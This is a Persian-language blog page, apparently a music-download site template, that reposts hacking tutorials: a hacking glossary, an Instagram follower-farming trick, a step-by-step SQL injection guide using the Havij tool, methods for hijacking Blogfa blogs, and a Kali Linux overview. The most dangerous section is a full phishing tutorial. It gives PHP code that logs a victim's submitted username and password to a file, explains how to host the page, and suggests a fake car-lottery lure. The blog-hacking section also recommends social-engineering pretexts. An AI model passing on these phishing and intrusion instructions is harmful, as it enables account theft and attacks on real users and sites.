آهنگ های پیشنهادی

دانلود آهنگ حمید هیراد آدمک
حمید هیراد آدمـک
دانلود آهنگ
0:00
0:00

دانلود آهنگ جدید اصـطـلـاحـات هــــک به همراه متن و پخش آنلاین

در این بخش قصد دارم شمارو با یک سری از اصطلاحات روزمره که هکرها با آنها سرو کار دارند آشنا کنم .

 

✅_تارگت Target

در لغت به معنای هدف و واحد است و بعنوان مثال :

شما زمانی که سایتی برای نفوذ در نظر دارید ، به اصطلاح به این هدف شما تارگت گفته میشود .

✅_ باگ Bug

باگ ها یا حفره‌های امنیتی یا خرابی های امنیتی و یا به همان حفره های امنیتی گفته میشود و این خرابی ها از اشکالات و سهل انگاری های برنامه نویسان وب و صفحات وب است وهکر از این نقاط ضعف به نفع خود برای هر نوع هدفی استفاده میکند و زمینه های نفوذ به سایت ها همین باگ ها و خرابی ها هستند.

✅_ دیفیس Deface

در کل به معنای تغییر ظاهری سایت یا یک صفحه است و برای درک بهتر زمانی که شما تارگت مورد نظر را هک میکنید برای اثبات هک خود ، صفحات سایت (یا صفحه اصلی) را تغییر میدهید و به اصطلاح به این عمل شما دیفیس کردن گوییم و یعنی شما سایت را دیفیس یا همان هک کرده‌اید .

✅_ بایپس Bypass

به معنای دور زدن یا همان میانبر است و گاهی اوقات در زمانی که شما در حال هک کردن تارگتی هستید ، برخی از دستورات اجرا نمیشوند و یا به خاطر ابزارهای امنیتی سایت ، یا هر چیز دیگری نمی توانید دسترسی بگیرید و حال هکرها برای ادامه دادن به هک ، با مشکل مواجه میشوند پس به کمک انواع روش ها این دستورات رو به نوعی وارد و ابزار محافظتی را دور میزنیم که به این کار بایپس کردن گوییم.

✅_ اکسپلویت Exploit

کدهای مخربی هستند که بنا به نیاز نفوذگر نوشته میشوند و توسط برنامه نویسی زبان C , ++C , Perl , Python ,.. نوشته می شوند ( البته همه آنها مخرب نیستند ) .

✅_ فیک پیچ Fake Page

بعضی از هکرها صفحه ایی مانند صفحه ی ورود به سایت طراحی میکنند و این صفحه ها مانند بقیه ی صفحات اینترنتی هستند ولی فرق اینها در کدنویسی آنهاست که اکثرا کد نویسی ها به صورتی است که وقتی قربانی یوزرنیم و پسورد خود را وارد این صفحه میکند یوزرنیم و پسورد برای هکر ارسال میشود نه به سایت مربوطه و البته این نوع حمله بیشتر برای هک ایمیل ها و اکانتهای مختلف استفاده میشود.
ولی از این روش هم میتوان برای هک سایت استفاده کرد.

✅_ دورک Dork

دورک ها سری کدهایی هستند که فرد برای جستوی سریع و دقیق تر در موتور های جستجو گر از آن استفاده میکند و برای این گفتم فرد چون مختص به هک کردن نیست و میشه از این طریق اطلاعات بسیار خوبی رو بدست آورد .

✅_ گوگل هکینگ Google Hacking

ساده ترین تعریف: استفاده از گوگل جهت هک را گوگل هکینگ میگویند یعنی اینکه هکر توسط سرچ هایی که در گوگل انجام می دهد قربانیان خود را پیدا می کند .

✅_ هش Hash

هش ها یه جور الگوریتم و روش های کد گذاری و رمزگذاری متن هاست و مدل هایی از جمله :


✅_ ا) MD5 -MD4

✅_ ا) MySql

✅_ ا) WordPress

✅_ ا) Joomla

و… دارد .

✅_ کرک Crack

در کل به معنای شکست و نفوذ است که این نفوذ میتواند به برنامه ها باشد و این شکستن میتواند شکستن پسوردها و متن های رمزنگاری شده باشد .

✅_ پچ Patch

به معنای جایگزین و درست کردن چیزی و مثل پچ کردن باگ ها و بر طرف سازی همان اشکالات امنیتی می باشد و ….

✅_ هگز Hex

یک نوع الگوریتم رمزنگاری است و همچنین یکی از روشهایی که هکرها برای بای پس استفاده می کنند این طریق است .

✅_ پورت Port

یک سری درگاه های اتصال و انتقال میباشد , مثل : ۲۱۲۱ ,۸۰ ,۸۰۰۰ ,….

PedramFCI, [30.12.16 18:43]
[Forwarded from BlackhatFCI]
✅_ اف تی پی Ftp

ا) FTP یا پورت ۲۱ که مخفف File Transfer Portocol است یعنی پروتکل انتقال فایل و این پورت برای انتقال فایل به کار میرود و این انتقال در دو جهت آپلود و دانلود انجام میشود .

✅_ شل Shell

شل در لغت به معنی پوسته است و در سیستم عامل های لینوکس جزء قسمت هایی است که رابط کاربر بین سخت افزار می باشد و در مفاهیم هکینگ هنگامی که شخص نفوذگر با استفاده ابزارها و کارهای خود می تواند به سیستم مورد نظر خود نفوذ کامل کند و کنترل سیستم را به دست بگیرد اصطلاحاً می گویند شل گرفته است و می تواند تصمیمات خود را عملی گرداند .

 

اصـطـلـاحـات هــــک

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:اصـطـلـاحـات هــــک, 211 بازدید
ادامه و دانلود

دانلود آهنگ جدید افزایش فـــــالــــور به همراه متن و پخش آنلاین

افزایش فـــــالــــور

 

این آموزش توسط گروه بلک گوستس نوشته و امروزه جز چند راه آسان افزایش فالور و حتی شاید بهترین راه رایگان افزایش فالور است. 

خب ابتدا شما باید حداقال پنج اکانت اینستاگرام بسازید(بجز اکانت اصلی خودتان)برای این کار می توانید از طریق شماره تلفنتان یا جیمیل هایتان اکانت ها را بسازید برای ساخت از خود برنامه اینستاگرام یا سایت رسمی اینستاگرام استفاده کنید سپس برنامه فالور گیر اینستاگرام و کافه اینستاگرام و اپ کلونر رو از بازار یا مایکت یا...دانلود کنید بعد از طریق برنامه APP CLONERچندنمونه تکثیر کنید بعد از اینکار درهرکدام از برنامه ها یوزرنیم رو وارد کنید بعد فالو خودکار رو بزنید(پیشنهاد میشه موقع خواب این کارو انجام بدید)سپس بعد مدتی که سکه های زیادی جمع شد همه سکه هارو به اکانت اصلی انتقال بدید و با اکانت اصلی فالور بخرید با این کار نه پولی دادید نه به فالویینگ های شما اضافه شده و شما می توانید با عضو شدن در کانال فالورگیر اینستاگرام هرروز با هر اکانت بین 10یا100عدد سکه جایزه بگیرید و در آخر هفته همه سکه هارو به اکانت اصلی انتقال بدید که اینطوری بدون هیچکاری حداقل200تا فالور در هفته بگیرید یا با عضو شدن در ربات تلگرام برنامه کافه اینستا و معرفی ربات به مخاطباتون سکه جایزه بگیرید.

امیدوارم لذت برده باشید

 

افزایش فـــــالــــور

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:افزایش فـــــالــــور, 205 بازدید
ادامه و دانلود

دانلود آهنگ جدید آموزش هک سایت با نرم افزار هویج به همراه متن و پخش آنلاین

آموزش هک سایت با نرم افزار هویج

 

 میخوام آموزش ساده و کلی استفاده از نرم افزار هویج رو یاد بدم. چون بعدا از همه این آموزش ها فیلم میزارم .هویج چیست : هویج یک نرمافزار که شما رو برای هک سایت های که باک sql دارند کمک میکنه با استفاده از این نرم افزار شما براحتی میتونید تعداد column و آسیب پذیری ها رو بدست آورید و همچنین از این طریق username و password ادمین بدست آورید همچنین میتوانید admin page و hash ها رو نیز بدست آورید. قبل از شروع باید برنامش رو دانلود کنید برای این کار از بخش ابزار هک sql متونید دانلود کنین خب اول باید 

تارگت خودتونو پیدا کنید. باید آخر آدرس سایت مورد نظر حتما عدد باشه مثلا:lang=0 که ما باید آخرش یک (( \' )) اضافه کنیم(مثلا: target.com/news.php?lang=0\' Enter konid ). اگه سایت به صورت نصفه و ناقص لوئد نشد بی خیال بشین اگه شد باگ داره به کارتون ادامه بدین. برنامه هویج رو باز کنید و در قسمت Target آدرس سایت مورد نظر رو بدون (( \' )) وارد کنید بعد Analyze رو بزنید. برنامه شروع به آنالیز میکنه... وقتی آنالیز تموم شد Column ها شمرده و انتخاب شده اند. حالا از کادر بالا سربرگ های پر کاربرد رو معرفی میکنم Info=نمایش اطلاعات ابتدایی آنالیز Tables=برای پیدا کردن تیبل ها Find Admin=برای پیدا کردن صفحه ورود و مدیریت سایت MD5=برای کرک کردن پسورد های هش شده خب اول روی گزینه Tables میریم بعد روی قسمت Get Tables میریم تا همه Table ها نمایش داده بشن.بعد از این که تیبل ها نمایش داده شدند باید تیبلی که نام کاربری و پسورد ادمین و کاربرای سایت گنجونده شده اند رو پیدا و انتخاب و نهایتا Get Columns رو کلیک کنید. حالا زیر شاخه های مورد نظر رو انتخاب کرده و گزینه Get Data رو انتخاب میکنیم تا رمز و نام کاربری رو نشون بده وقتی دستورات فوق را انجام دادین میبینین که پسورد هش شده هستش و ما میتونیم از سربرگ MD5 برای کرک کردن پسورد استفاده کنیم.

 

آموزش هک سایت با نرم افزار هویج

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:آموزش هک سایت با نرم افزار هویج, 316 بازدید
ادامه و دانلود

دانلود آهنگ جدید آموزش هــــک ســـایت به همراه متن و پخش آنلاین

آموزش هــــک ســـایت

در این مقاله قصد داریم راه های مختلف هک شدن سایت و راه های جلوگیری از هک سایت را بررسی کنیم. قبل از اینکه بدانیم چگونه باید امنیت سایت را برای مقابله با هک شدن بالا ببریم باید بیاموزیم چگونه باید یک وب سایت را هک کنیم، پس باید بدانیم آیا آن وب سایت هک شدنی هست یا نه!!! یا اگر هک شدنی هست آیا راه نفوذ به وب سایت مذکور ساده است یا پیچیده؟! سایتی هک می شود که باگ امنیتی داشته باشد. باگ در لغت به معنای حفره و در اصطلاح هکر ها یعنی راه نفوذ به وب سایت و هک کردن آن.

انواع هک

اول انواع هک را مشخص کنیم و بعد بریم سراغ طریقه انجام هک!

هک کردن انواع مختلف دارد اما می توانیم به دو دسته کلی هک سمت سرور (Server Side) و هک سمت کاربر (Client Side) تقسیم کرد.

هک سمت کاربر یعنی از خود کاربر برای هک کردن او استفاده کنیم. مثلا هنگامی که می خواهد وارد ایمیلش شود پسوردش را بدزدیم یا هنگامی که می خواهد اطلاعات بانکی اش را برای خرید اینترنتی وارد کند اطلاعاتش را ذخیره کنیم. اما چگونه!؟ رایج ترین این نوع هک تروجان می باشد. تروجان یعنی ساختن یک صفحه کاملا شبیه صفحه ورود به ایمیل یا بانک و ... و کشاندن کاربر با ترفندهای حاص به آن صفحه. کاربر که نمی داند آن صفحه صفحه شخصی شماست اطلاعاتش را براحتی وارد پایگاه داده شما می کند و در اختیار شما قرار می دهد.

راه جلوگیری: شما به عنوان یک کاربر باید هوشمند باشید و موقع وارد کردن اطلاعات شخصی مثلا ایمیل و پسورد حتما داخل آدرس بار را چک کنید که سایت مورد نظر دقیقا همان است که شما داخلش هستید؟ مثلا:

http://mail.google.com

https://mail-google.com

https://mail.googel.com

این سه آدرس می تواند اطلاعات ایمیل و پسورد ایمیل شما را براحتی از شما بدزده!! چون این سایت ها هیچ ربطی به گوگل نداره و سایت های شخصی هستند که می خواهند اطلاعات شما را بگیرند. آدرس درست این می باشد:

https://mail.google.com

هک سمت سرور که بسیار رایج تر می باشد و انعطاف بیشتری دارد. این هک خود انواع مختلف دارد که مهمترینشان:

  • Xss
  • استفاده از شل
  • sql Injection
  • Lfi
  • Rfi

Xss

این باگ که یکی از فراوان ترین باگ های موجود میباشد که طبق آمار 69 درصد وبسایت ها این باگ را دارن. از نظر امنیتی باگ مهمی به حساب نمیاد با استفاده از این باگ میشه روی سیستم قربانی انواع اقسام نفوذ رو انجام داد.(در قسمتی از سایت که باگ دارد شما قادر به اجرا کردن کد های JavaScript هستید که با استفاده از کد های جاوا اسکریپ کار های زیادی میشه انجام دارد!!!) 

استفاده از شل

شل یک فایل حاوی کد های اسکریپت مخرب است که هکر آن را در سایت شما آپلود می کند و سپس در سرور شما اجرا می کند! آپلود کردن فایل شل از راه های مختلف امکان پذیر است. مثلا از قسمت browse که شما در سایت خود قرار داده اید تا کاربران فایل های خود را آپلود کنند یا عکس های خود را آپلود کنند.

راه جلوگیری: یکی از کارهایی که می توانید جهت جلوگیری انجام دهید این است که فایل هایی که آپلود می شود را چک کنید. مثلا برای عکس فقط اجازه فایل های png,jpg,bmp,gif را بدهید.

راه دیگر آپلود فایل شل به این صورته: هکر به این صورت کار خود را آغاز می کند که با یک جستجوی ساده نام میزبان شما را در می آورد.مثلا میزبان شما شرکت X است.بعد چک می کند و می بیند که میزبان شما علاوه بر سایت شما 100 سایت دیگر را هم میزبانی می کند.خب شروع می کند به جستجو و با کمی جستجو اون 100 سایت را پیدا می کند.حالا نوبت به هک کردن می رسد.منتها این بار نه سایت شما.بلکه سایت همسایه ی شما!اون سایت که احتمالا ادمین آن یادش رفته اصلا حتی پسورد بیشتر از 6 کاراکتر بگذارد به راحتی هک می شود.خلاصه بعد ازهک سایت همسایه ی شما ، با یک شل مخصوص که خودش اون رو دی کد کرده (نا خوانا توسط آنتی ویروس) از سرور شما دسترسی روت می گیرد (یعنی به تمام فایل های موجود در کامپیوتر سرور که میزبانی سایت شما و اون 100 سایت دیگر را بر عهده دارد دسترسی پیدا می کند) و سایت شما را هک می کند.

راه جلوگیری: از سرور اختصاصی استفاده کنید، که هزینه زیادی برایتان ایجاد می کند.

Sql Injection

این نوع هک اکثرا از آدرس بار، جایی که آدرس سایت را می نویسید در بالای مرورگر انجام می شود. هک کردن از این روش رایج ترین و قدیمی ترین روش هاست که با چند دستور ساده می توانید تمام اطلاعات پایگاه داده را بیرون بکشید. هکر ها برای این کار از تزریق کد های sql وارد عمل می شوند. این نوع هک از صفحاتی از سایت که دارای query string می باشد انجام می شود. امروزه وب مسترها به این نوع هک آگاهی کامل دارند و معمولا جلوی این راه های نفوذ را می گیرند. اما هنوز هم وب سایت های فراوانی یافت می شوند که این حفره بزرگ را دارند.

راه جلوگیری: استفاده از stored procedure و یا داده های پارامتری در دیتا بیس و یا چک کردن query string با استفاده از الگوریتم برنامه نویسی و تشخیص اینکه تزریق انجام شده یا نه!!

Lfi و Rfi

این باگ با بی احطیاتی برنامه نویس در استفاده از توابع Include و ... به وجود میاد.
در اصل این توابع (include , require ... ) فایل یا صفحه ای رو فراخوانی میکنن که اگر روی این درخواست کنترلی نباشه میتونه منجر به باگ Rfi یا حتی Lfi بشه.
هک Lfi یا Local File Inclusion یک نوع دسترسی لوکال به هکر برای مشاهده ی فایل های سرور مورد نظر میده (یعنی به همه چیز روی سایتتون "نه سرورتون" دسترسی پیدا می کنه!). که همانطور که ذکر شد باگ Lfi بیشتر در اشتباهات برنامه نویس در استفاده از توابعی مثل Include ,require() و غیره رخ میده.
با استفاده از این باگ حرکت های زیادی میشه کرد از جمله:

1 - تبدیل آن به اجرای دستورات از راه دور با استفاده از لوگ های Apache
2 - خواندن فایل های مهم سیستمی با فایل های config
و ...

 

آموزش هــــک ســـایت

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:آموزش هــــک ســـایت, 215 بازدید
ادامه و دانلود

دانلود آهنگ جدید {آموزش هک وبلاگ} به همراه متن و پخش آنلاین

 

{آموزش هک وبلاگ}


من تمام روش های هک وبلاگ رو براتون می گم و عملی بودن یا نبودن اونها رو هم براتون می گم. (البته همشون ممکن هستند ولی احتمال به موفقیت رسیدن بعشی هاشون پایین هست و بعضی ها هم بالا)
این هم اضافه کنم که این سایت هیچ مسئولیتی در برابر استفاده نا صحیح از این مقاله رو نداره.

برسیم به روش های هک وبلاگ که من از آسون تا سخت براتون می گم :

1- هک ایمیل نویسنده ی وبلاگ :
2- استفاده از صفحات تقلبی (Fake Page) و یا ایمیل قلابی
3- استفاده از IP Sniffer 
4- کشف باگ سرورها و نفوذ در آنها

روش اول (هک ایمیل نویسنده) :
در این روش باید تمام روش های هک ID و Email رو بکار ببرید که آموزش هاش رو بعدا می زارم (البته تو اینترنت زیاده. مثل هک از طریق صفحه ی تقلبی و ....). بعد از اینکه پسورد به دست آوردید , به آدرس سرور برید و پسورد وبلاگ رو به راحتی بگیرید. مثلا برای سرور بلاگفا به آدرس زیر می ریم : www.blogfa.com و روی کلمه عبور را فراموش کردم کلیک می کنید و نام وبلاگ و آدرس ایمیل نویسنده رو که هک کردید رو وارد می کنید و در صورت درست بودن هر دو تا یک یک ایمیل با آن آدرس ایمیل از طرف بلاگفا ارسال می شه که حاوی پسورد جدید وبلاگه و این جوری می تونید وارد کنترل پنل وبلاگ شده و هر کار که با وبلاگ دوست دارید بکنید. 
مثلا برای هک کردن این وبلاگ itgirls.blogfa.com : ابتدا ایمیل نویسنده (که it_girls86@yahoo.com  هست) رو پیدا می کنیم. حالا قسمت سخت این روش هک این ایمیله. بعد طبق بالا پسورد وبلاگ رو در می آریم و .....
دیدید چقدر راحته؟ 


روش دوم (استفاده از صفحه قلابی)
اول از همه بگم صفحه تقلبی چیه ؟ صفحات وبی (شبیه صفحات log in سایت های معروف) که با نوشتن پسورد به جای ورود به وبلاگ , پسورد برای آدرس شما ارسال می شه. این صفحات با نوشتن یک سری کد تو صفحه بدست می آن.
شما می تونید از این صفحات استفاده کنید و مثل یک هکر با شخصیت , وبلاگ هک کنید. من صفحه ی تقلبی بلاگفا رو براتون گذاشتم فقط باید به جای ایمیل ali.naghavi.it@gmail.com ایمیل خودتون رو وارد کنید و فایل جدید رو با پسوند .html  سیو کنید. حالا باید توی یک فضای رایگان آپلود کنید.
بعد وارد مرحله ی حساس گول زدن می شیم که به ضریب هوشی شما (هکر) بستگی داره و به اندازه ی زرنگی خودتون می تونید تعداد زیادی وبلاگ هک کنید. البنه یک مقاله در مورد مهندسی اجتماعی می زارم که گول زدن هم یاد بگیرید.
مثلا شما می تونید بگید :
سایت بلاگفا یک تعداد امکانات جدید از جمله : بازدید های امروز و دیروز و ماه و سال , وصل وبلاگ بلاگفا به دامین , حذف پسوند  blogfa.com به هر چیزی که می خواهید و ... را آماده کرده است. برای دیدن همه ی امکانات بر روی لینک زیر کلیک کنید.
اینجا هم می تونید آدرس صفحه ی تقلبی تون رو بزارید
این فقط یه نمونه هست که می تونید از طرف بلاگفا تو نظرات وبلاگ ها ی دیگه بزارید
روش سوم (استفاده از IPSniffer) 
برنامه های IPSniffer که یکی از نمونه های رایج اون Packet Sniffer Earth Detect هست. این برنامه مثل چی می گرده وبلاگهایی که که در آن لحظه ON  هستند رو پسوردش رو پیدا می کنه. البته پسوردها به صورت کد شده هستند و باید کرک شن که شما می تونید از برنامه هایی مثل John the rippr , L0pht crack , Palm crack و ... استفاده کنید. اما من برنامه ی Cain رو پیشنهاد می کنم. این برنامه علاوه بر اینکه خودش یک Sniffer هست یک کراکر بسیار قوی هم هست. بنایراینکار دوتا برنامه رو براتون انجام میده.
لینک دانلود Cian برای XP : 
http://www.oxid.it/downloads/ca_setup.exe

البته استفاده از Sniffer به مودم شما هم بستگی داره و در بعضی مودم ها کار نمی کنه و در کل خیلی هم عملی می شه چون معمولا سرورها هم امنیتشون تقریبا بالا رفته و سخته که کار کنه ولی شما رو همه ی سرورها امتحان کنید. چون اگه جواب بده شما 40 تا 40 وبلاگ هک می کنید.
روش چهارم (کشف باگ سرورها و نفوذ در آنها)
این روش نیاز به دانش هکری بالا و اشنایی با مفاهیم شبکه و اشنایی کار کردن با نرم افزارهای اسکنر و اکسپلویت ها و بسیار از چیزهای دیگه دارد, و برای کسانی که تازه وارد مقوله هک شده اند بسیار دشوار است. البته به شما پیشنها د می کنم  که حتما نبال این ها بروید و دانش تون رو تو این زمینه ها بدید و دیگه از هک آی دی و وبلاگ و این جور بچه بازیها دست بردارید.
من یک تصویر ذهنی برای شما در این زمینه می سازم . شما می یابد مثلآ یک سرور مثل همین بلاگفا خودمون رو توسط نرم افزارهای اسکنر(Nssus , NMAP , Retina,Xscan , languard , attack TOOLKit’Atk و...) اسکن می کنید و آسیب پذیری های (Vulnerability) اون رو پیدا می کنید  و آسیب پذیری های (Vulnerability) اون رو پیدا می کنید. بعد توسط اکسپلویت (Exploit) هایی که برای آن آسیب پذیری ها نوشته شده نفوذ می کنید و کنترل اون رو به دستتون می گرید. البته شاید به نظر شما آسون بیاد اما یادتون باشه که سرورها هم گاگول (!) نیستند و سعی می کنند امنیتشون رو بالا ببرند اما همیشه امنیت کامل برقرار نیست. مطمئن باشید که سرورها قبل از شما سرور خودشون رو اسکن کردند و باگ های اون رو پیدا کردند ولی اینجا بر می گرده به شانس و اسکنر شما. البته اگه علم هکینگ تون انقدر بالا باشه که بتونید دستی سرورها رو چک کنید مطمئنا باگ پیدا می کنید. البته تو این روش صاحب وبلاگ هیچ کاری برای جلوگیری از هک شدن نمی تونه بکنه. فقط می تونه اگه باگی پیدا کرد سریع گزارش بده تا رفع شه.
من اینجا امنیت سرورهای خودمون رو از بهترین تا بدترین براتون لیست کنم :
ا1-  Persiangig  *
ا2- Blogfa
ا3- Parsblog  
ا4- caspianblog 
ا5-  Mihanblog
ا6-  Persianblog **

به پایان مقاله رسیدیم. این مطالب فقط برای بالا بردن اطلاعات شما در زمینه ی هک و امنیت شبکه هست. از این مطالب می تونید برای بالا بردن امنیت وبلاگتون استفاده کنید. من خواهش می کنم که از این مطالب استفاده ی به جا داشته باشید , چون همونطور که خود شما انتظار دارید کسی همچین بلایی سر خودتون بیاره !

* این سایت در حقیقت سرویس دهنده ی وبلاگ نیست بلکه یک هاست 100 مگابایتی رایگان برای ایرانیان است که می شه برای وبلاگ هم استفاده کرد اما برای افراد نا آشنا به امور برنامه نویسی وب کار دشواری هست.
** من به هیچ وجه این سرویس دهنده رو پیشنهاد نمی کنم. چون به دلیل امنیت بسیار پایین چند وقت پیش هک شد و تمام وبلاگ ها بسته شدند.

 

هرگونه سواستفاده به عهده خود کاربر است.

 

{آموزش هک وبلاگ}

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:{آموزش هک وبلاگ}, 314 بازدید
ادامه و دانلود

دانلود آهنگ جدید به همراه متن و پخش آنلاین

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:, 174 بازدید
ادامه و دانلود

دانلود آهنگ جدید کالـی لـیـنـوکـس به همراه متن و پخش آنلاین

کالـی لـیـنـوکـس

 

Kali Linux یکی از توریع های لینوکس است که توجه اکثر هکر ها را به خود جذب کرده ، این سیستم عامل قدرتمند با نماد اژدها به جای سیستم عامل بک ترک نشسته و بیشتر برای تست نفوذ استفاده می شود. این توزیع به پشتوانه ی Debian منتشر شده و حتی از روی usb فلش هم قابل اجراست.
با Kali Linux شما می توانید به انواع شبکه ها ، وب ساتها ، تلفن های همراه ، تلبت ها و …. به راحتی نفوذ کنید و از هک لذت ببرید.

برای دانلود آخرین ورژن Kali Linux بر این لینک کلیک نمائید و پس از ورود به صفحه مورد نظر نام و ایمیل خود را وارد نمائید ، سپس دکمه Register & Download را بفشارید تا وارد صفحه دانلود شوید . حال بسته به نوع سیستم خود نسخه مورد نظر را انتخاب و دکمه Download Kali را کلیک کنید.

 

خصوصیات مهم کالی لینوکس

داشتن بیش از ۳۰۰ ابزار تست و نفوذ : پس از بررسی همه ی ابزار های بک ترک تیم توسعه ی کالی بهتر دید برخی از ابزارهایی که کار نمی کنند را حذف کند و تنها ابزارهای مفید و تست شده را در کالی اعمال کند.

کالی رایگان است و همیشه خواهد ماند : Kali لینوکس همانند جد خود بک ترک رایگان عرضه می شود و همیشه رایگان خواهد ماند و شما هرگز برای تهیه ی آن پولی نخواهید پرداخت !
منبع باز و اوپن سورس : شما قادر خواهید بود هر نوع تغییری را در کالی لینوکس اعمال کنید و از تمامی مزایای اوپن سورس بهره ببرید .

سازگار با FHS : کالی لینوکس با پایبندی به استاندارد فایل سیستم سلسه مراتب توسعه یافته است .

پشتیبانی بیشتر کارتهای شبکه ی وایرلس : کالی لینوکس را طوری ساخته اند که قادر است بیشتر کارتهای شبکه وایرلس اینترنال وکارت های شبکه ی وایرلس USB را شناسایی و پشتیبانی کند.

هسته ی سفارشی : برای تست نفوذ تیم توسعه اغلب به ارزیابی های وایرلس دارد و هسته آخرین قوای پشتیبانی برای تزریق است.

محیط توسعه امن : تیم توسعه ی کالی لینوکس از یک گروه کوچک و قابل اعتماد تشکیل شده است و تنها مخازن امن را در کالی قرار می دهند.

تعهد GPG : هر بسته ای در کالی باید امن باشد و تیم توسعه ی هر بسته نسبت به امنیت واعتماد آن بسته تعهد می دهد و برای محکم بودن این تعهدات قرارداد های دو طرفه صورت میگیرد.

پشتیبانی از انواع زبان ها : با این که کالی به صورت پیش فرض دارای زبان انگلیسی است اما توانایی پشتیبانی از تمامی زبان های زنده ی دنیا را دارد.

کاملا قابل تغییر است : با این که در حالت پیش فرض کالی دارای محیط کاربری گنوم ۳ است اما کاربران قادر خواهند بود محیط و تنظیمات دلخواه خود را بر روی کالی لینوکس اعمال کنند.

پشتیبانی از سیستم های ARMEL و ARMHF : تیم توسعه ی کالی می داند که سیستم های مبنی بر ARM رو به افزونی و رایج شدن هستند و کالی سعی دارد تا خود را با این نوع سیستم ها سازگار تر کند و هر روز بر این قابلیت خود می افزاید , در حال حاضر کالی سیستم های ARM زیر را پشتیبانی می کند :

rk3306 mk/ss808

Raspberry Pi

ODROID U2/X2

Samsung Chromebook

 

کالـی لـیـنـوکـس

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:کالـی لـیـنـوکـس, 193 بازدید
ادامه و دانلود

دانلود آهنگ جدید فـیـک پـیـج به همراه متن و پخش آنلاین

فـیـک پـیـج

 

بعضی از عزیزان دوست دارند یاد بگیرن که فیک پیج بسازن

آموزشی که میدم کلیه یعنی هر سایتی که خواستید رو میتونید ازش فیک پیج بسازید !
خوب دیگه زیاد حرف زدم میریم سر آموزش :

1- اول سایتی رو که میخواید ازش فیک پیج بسازید رو باز کنید .

2- بعد از باز کردن سایت تا لود شدن کامل صبر کنید . حالا راست کلیک زده گزینه save page as رو بزنید و صفحه را در حالت web page complete ذخیره کنید .

3- حالا صفحه را با notepad باز کرده و Ctrl+F رو بزنید تا گزینه find بیاد . توش بنویسید login و فایند رو بزنید . احتمالا پشت login نوشته action . خوب ما همون login رو لازم داریم . ممکنه login با پسوند php ( که عالیه ) و یا aspx و یا هر چیز دیگری ذخیره شده باشه . من آموزشی که دادم برای php هستش . اگه پسوند چیز دیگه ای بود تو ادامه همین پست بگید تا بگم چجوریه . خوب اگه login.php پشتش هرچی هست ، پاکش کنید . مثلا اگه به صورت http://www.test.com/login.php ، شما فقط login.php اینو بزارید . بعد اگه method="post" هستش شما اونو به method="GET" تغییر بدید .

4- فعلا اینا رو بزارید کنار یه notepad جدید باز کرده این کد پایین رو توش بریزید :

header ('Location: http://target.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
به جای http://target.com اسم سایت مورد نظر رو بنویسید . دقت کنید اگه صفحه لاگین رو میخواید بسازید باید برای همون صفحه این کار رو انجام بدید . مثلا اگر برای mail.yahoo.com میخواید فیک درست کنید نرید این کارا رو روی yahoo.com انجام بدیدا !!!
خوب حالا فایل را به نام login.php ذخیره کنید . فایل اول رو هم با پسوند html ذخیره کنید .

5- برید توی یه سایت فضای رایگان مثل www.my3gb.com یا http://www.000webhost.com که php رو برای آپلود ساپورت کنه عضو شوید . و هر دو فایل رو آپلود کنید . اگه بلد نیستید روی سایت فایل آپلود کنید اشکال نداره ، توی فیلمی که بعدا میزارم آموزش اونم میدم . اگه کسی بلد نبود پیام بده یادش میدم

6- حالا کافیه آدرس اون فایل .html تون رو به طرف بدید و بگید شما در قرعه کشی امسال برنده یک خودروی مزدا3 شده اید . لطفا برای اطلاعات تکمیلی به این آدرس بروید !!!

7- طرف یوزر و پسوردش رو وارد کرده روی دکمه login.php کلیک میکنه . بعد بوووومب !!!
اگه به کد login نگاه کرده باشید یه جا نوشته log.txt . اون همون جایی که یوزر و پسورد طرف توش ذخیره میشه . نگران نباشید جاش امنه ! توی همون هاست خودتون این فایل با کلیک طرف اتوماتیک وار درست میشه .

امیدوارم تونسته باشیم کمکی بهتون بکنیم

 

فـیـک پـیـج

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:فـیـک پـیـج, 235 بازدید
ادامه و دانلود

دانلود آهنگ جدید به همراه متن و پخش آنلاین

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:, 221 بازدید
ادامه و دانلود

دانلود آهنگ جدید به همراه متن و پخش آنلاین

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:, 134 بازدید
ادامه و دانلود

دانلود آهنگ جدید VPS یا سرور مجازی چیست؟ به همراه متن و پخش آنلاین

VPS یا سرور مجازی چیست؟

 

VPS یا سرور مجازی چیست؟

(بیشتر…)

چهار شنبه 18 تير 1399برچسب:VPS یا سرور مجازی چیست؟, 309 بازدید
ادامه و دانلود
چهار شنبه 18 تير 1399برچسب:افزایش سرعت بالا آمدن ویندوز7, 300 بازدید
ادامه و دانلود

دانلود آهنگ جدید آموزش نصب کردن تم در کالی لینوکس به همراه متن و پخش آنلاین

 آموزش نصب کردن تم در کالی لینوکس

مراحل :

ابتدا ترمینال را باز کرده و دستور apt-get gnome-tweak-tool را وارد میکنیم

بعد از نصب کردن gnome-tool دستور زیر را در ترمینال اجرا میکنیم

gnome-tweak-tool

خب حالا به محل نصب تم ها در کالی رفتیم .

خب حالا برای دانلود کردن تم مورد علاقه ی خود به سایت gnome-look.org رفته و تم مربوطه را دانلود کنید

حالا بعد از دانلود تم مورد نظر فایل تم رو در مسیر زیر کپی میکنید

computer/usr/share/themes
و بعد تم را از حالت فشرده خارج کرده و در انجا paste
حالا یه بار برنامه را ببنید و بعد با دستور gnome-tweak-tool وارد بخش مورد نظر شده و تم را انتخاب کنید.

 

آموزش نصب کردن تم در کالی لینوکس

(بیشتر…)

چهار شنبه 18 تير 1399برچسب: آموزش نصب کردن تم در کالی لینوکس, 299 بازدید
ادامه و دانلود

دانلود آهنگ جدید هـــک تـلـگـرام1 به همراه متن و پخش آنلاین

سلام دوستان
در این پست هم سعی میکنم اموزش جامع هک تلگرام رو قرار بدم بطوری که همه روش هاشو بگم آخه دیه خسته شدم از اینکه هی میپیرسین تلگرام چجوری هک میشه
اول بگم که هیچ برنامه ای برای هک تلگرام وجود نداشته و نداره و نخواهد داشت و هرجا هم که تبلیغ میکنن فقط در حد تبلیغه
